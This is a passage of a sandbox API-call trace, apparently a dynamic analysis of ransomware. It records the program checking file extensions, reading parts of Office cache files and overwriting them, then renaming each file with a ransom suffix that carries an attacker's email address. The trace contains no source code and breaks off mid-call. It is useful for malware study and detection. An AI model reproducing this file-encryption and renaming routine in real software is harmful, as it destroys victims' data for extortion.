[0047.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.712] lstrlenW (lpString=".doc") returned 4 [0047.712] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.712] lstrlenW (lpString=".docx") returned 5 [0047.712] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.713] lstrlenW (lpString=".pdf") returned 4 [0047.713] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.713] lstrlenW (lpString=".xls") returned 4 [0047.713] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.713] lstrlenW (lpString=".xlsx") returned 5 [0047.713] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.713] lstrlenW (lpString=".ppt") returned 4 [0047.713] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.713] lstrlenW (lpString=".zip") returned 4 [0047.713] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.713] lstrlenW (lpString=".rar") returned 4 [0047.713] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.713] lstrlenW (lpString=".bz2") returned 4 [0047.713] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.713] lstrlenW (lpString=".7z") returned 3 [0047.713] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.713] lstrlenW (lpString=".dbf") returned 4 [0047.713] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.713] lstrlenW (lpString=".1cd") returned 4 [0047.713] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.713] lstrlenW (lpString=".jpg") returned 4 [0047.713] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.713] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.713] lstrlenW (lpString=".doc") returned 4 [0047.713] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.713] lstrlenW (lpString=".docx") returned 5 [0047.713] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.713] lstrlenW (lpString=".pdf") returned 4 [0047.713] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.713] lstrlenW (lpString=".xls") returned 4 [0047.714] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.714] lstrlenW (lpString=".xlsx") returned 5 [0047.714] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.714] lstrlenW (lpString=".ppt") returned 4 [0047.714] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.714] lstrlenW (lpString=".zip") returned 4 [0047.714] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.714] lstrlenW (lpString=".rar") returned 4 [0047.714] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.714] lstrlenW (lpString=".bz2") returned 4 [0047.714] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.714] lstrlenW (lpString=".7z") returned 3 [0047.714] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.714] lstrlenW (lpString=".dbf") returned 4 [0047.714] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.714] lstrlenW (lpString=".1cd") returned 4 [0047.714] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.714] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.714] lstrlenW (lpString=".jpg") returned 4 [0047.714] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.714] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0047.714] lstrlenW (lpString="AccessMUI.msi") returned 13 [0047.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.739] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=2517504) returned 1 [0047.751] CloseHandle (hObject=0x160) returned 1 [0047.751] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi")) returned 0x2020 [0047.751] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.751] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0047.751] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0047.751] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.752] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.752] ReadFile (in: hFile=0x160, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.756] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.757] ReadFile (in: hFile=0x160, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.765] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.765] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.765] ReadFile (in: hFile=0x160, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0048.434] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.434] WriteFile (in: hFile=0x160, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0048.448] SetEndOfFile (hFile=0x160) returned 1 [0048.448] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fe70d0 [0048.448] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.448] WriteFile (in: hFile=0x160, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.450] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.450] WriteFile (in: hFile=0x160, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.836] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.836] WriteFile (in: hFile=0x160, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.839] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0048.841] CloseHandle (hObject=0x160) returned 1 [0048.841] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0048.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.842] lstrlenW (lpString=".doc") returned 4 [0048.842] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.842] lstrlenW (lpString=".docx") returned 5 [0048.842] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0048.842] lstrlenW (lpString=".pdf") returned 4 [0048.842] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.842] lstrlenW (lpString=".xls") returned 4 [0048.842] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.842] lstrlenW (lpString=".xlsx") returned 5 [0048.842] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0048.842] lstrlenW (lpString=".ppt") returned 4 [0048.842] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.842] lstrlenW (lpString=".zip") returned 4 [0048.842] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.842] lstrlenW (lpString=".rar") returned 4 [0048.842] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.842] lstrlenW (lpString=".bz2") returned 4 [0048.842] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.842] lstrlenW (lpString=".7z") returned 3 [0048.842] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.842] lstrlenW (lpString=".dbf") returned 4 [0048.842] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.842] lstrlenW (lpString=".1cd") returned 4 [0048.842] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.842] lstrlenW (lpString=".jpg") returned 4 [0048.843] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.843] lstrlenW (lpString=".doc") returned 4 [0048.843] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.843] lstrlenW (lpString=".docx") returned 5 [0048.843] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0048.843] lstrlenW (lpString=".pdf") returned 4 [0048.843] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.843] lstrlenW (lpString=".xls") returned 4 [0048.843] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.843] lstrlenW (lpString=".xlsx") returned 5 [0048.843] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0048.843] lstrlenW (lpString=".ppt") returned 4 [0048.843] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.843] lstrlenW (lpString=".zip") returned 4 [0048.843] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.843] lstrlenW (lpString=".rar") returned 4 [0048.843] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.843] lstrlenW (lpString=".bz2") returned 4 [0048.843] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.843] lstrlenW (lpString=".7z") returned 3 [0048.843] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.843] lstrlenW (lpString=".dbf") returned 4 [0048.843] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.843] lstrlenW (lpString=".1cd") returned 4 [0048.843] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.843] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.843] lstrlenW (lpString=".jpg") returned 4 [0048.843] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.844] lstrcmpiW (lpString1=".cab", lpString2=".USA") returned -1 [0048.844] lstrlenW (lpString="ProPrWW.cab") returned 11 [0048.844] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0050.236] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=177720283) returned 1 [0050.236] CloseHandle (hObject=0x1b4) returned 1 [0050.278] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab")) returned 0x2020 [0050.278] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.278] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0050.279] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0050.279] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0050.279] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.279] ReadFile (in: hFile=0x1b4, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.286] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.286] ReadFile (in: hFile=0x1b4, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.291] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.291] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.291] ReadFile (in: hFile=0x1b4, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.306] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.306] WriteFile (in: hFile=0x1b4, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0050.324] SetEndOfFile (hFile=0x1b4) returned 1 [0050.324] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f20060 [0050.458] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.458] WriteFile (in: hFile=0x1b4, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.459] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.459] WriteFile (in: hFile=0x1b4, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.460] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.460] WriteFile (in: hFile=0x1b4, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.462] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f20060 | out: hHeap=0x5d0000) returned 1 [0050.462] CloseHandle (hObject=0x1b4) returned 1 [0050.682] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0050.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.927] lstrlenW (lpString=".doc") returned 4 [0050.927] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.927] lstrlenW (lpString=".docx") returned 5 [0050.927] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.927] lstrlenW (lpString=".pdf") returned 4 [0050.927] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.927] lstrlenW (lpString=".xls") returned 4 [0050.927] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.927] lstrlenW (lpString=".xlsx") returned 5 [0050.927] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.927] lstrlenW (lpString=".ppt") returned 4 [0050.927] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.927] lstrlenW (lpString=".zip") returned 4 [0050.927] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.927] lstrlenW (lpString=".rar") returned 4 [0050.927] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.927] lstrlenW (lpString=".bz2") returned 4 [0050.927] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.928] lstrlenW (lpString=".7z") returned 3 [0050.928] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.928] lstrlenW (lpString=".dbf") returned 4 [0050.928] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.928] lstrlenW (lpString=".1cd") returned 4 [0050.928] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.928] lstrlenW (lpString=".jpg") returned 4 [0050.928] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.928] lstrlenW (lpString=".doc") returned 4 [0050.928] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.928] lstrlenW (lpString=".docx") returned 5 [0050.928] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.928] lstrlenW (lpString=".pdf") returned 4 [0050.928] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.928] lstrlenW (lpString=".xls") returned 4 [0050.928] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.928] lstrlenW (lpString=".xlsx") returned 5 [0050.928] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.928] lstrlenW (lpString=".ppt") returned 4 [0050.928] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.928] lstrlenW (lpString=".zip") returned 4 [0050.928] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.928] lstrlenW (lpString=".rar") returned 4 [0050.928] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.928] lstrlenW (lpString=".bz2") returned 4 [0050.928] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.928] lstrlenW (lpString=".7z") returned 3 [0050.928] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.929] lstrlenW (lpString=".dbf") returned 4 [0050.929] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.929] lstrlenW (lpString=".1cd") returned 4 [0050.929] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74 [0050.929] lstrlenW (lpString=".jpg") returned 4 [0050.929] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.929] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0050.929] lstrlenW 